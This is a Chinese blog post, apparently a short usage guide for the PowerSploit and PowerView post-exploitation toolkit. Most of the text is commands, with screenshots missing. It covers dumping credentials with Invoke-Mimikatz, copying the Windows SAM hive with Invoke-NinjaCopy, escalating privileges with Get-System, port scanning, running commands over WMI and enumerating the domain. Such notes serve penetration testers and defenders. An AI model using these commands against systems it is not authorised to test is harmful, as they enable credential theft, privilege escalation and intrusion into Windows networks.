PowerSploit的使用

Invoke-Mimikatz(依赖管理员)
Import-Module .\invoke-mimikatz.ps1
Invoke-Mimikatz –DumpCreds

在这里插入图片描述
使用Invoke-Mimikatz –command “mimikatz命令”来执行命令:

Invoke-Mimikatz –command "token::elevate"

在这里插入图片描述

Invoke-Ninjacopy (依赖管理员)

直接拷贝系统文件:
在这里插入图片描述

Import-Module .\invoke-ninjacopy.ps1
invoke-ninjacopy -Path C:\Windows\System32\config\SAM -LocalDestination C:\Users\administrator\Desktop\SAM

在这里插入图片描述

Get-System (依赖管理员)
Import-Module .\Get-System 
get-system

在这里插入图片描述

Invoke-Portscan

扫描Top50端口:

Invoke-Portscan –Hosts ip地址 –TopPorts 50

在这里插入图片描述
扫描特定端口:

Invoke-Portscan –Hosts ip地址 –Ports 端口

在这里插入图片描述

Invoke-ReverseDnsLookup

反向解析IP地址:

Import-Module .\Invoke-ReverseDnsLookup.ps1
Invoke-ReverseDnsLookup 192.168.91.131

在这里插入图片描述

Invoke-Wmicommand
Import-Module .\Invoke-Wmicommand.ps1
Invoke-Wmicommand -Payload {whoami}

在这里插入图片描述

Get-NetDomain
Import-Module .\PowerView.ps1
Get-NetDomain

在这里插入图片描述

Get-NetDomainController
get-NetDomainController

在这里插入图片描述

Invoke-ProcessHunter –ProcessName 进程名
Invoke-ProcessHunter –ProcessName powershell

在这里插入图片描述

Get-NetShare获取共享信息
get-netshare

在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值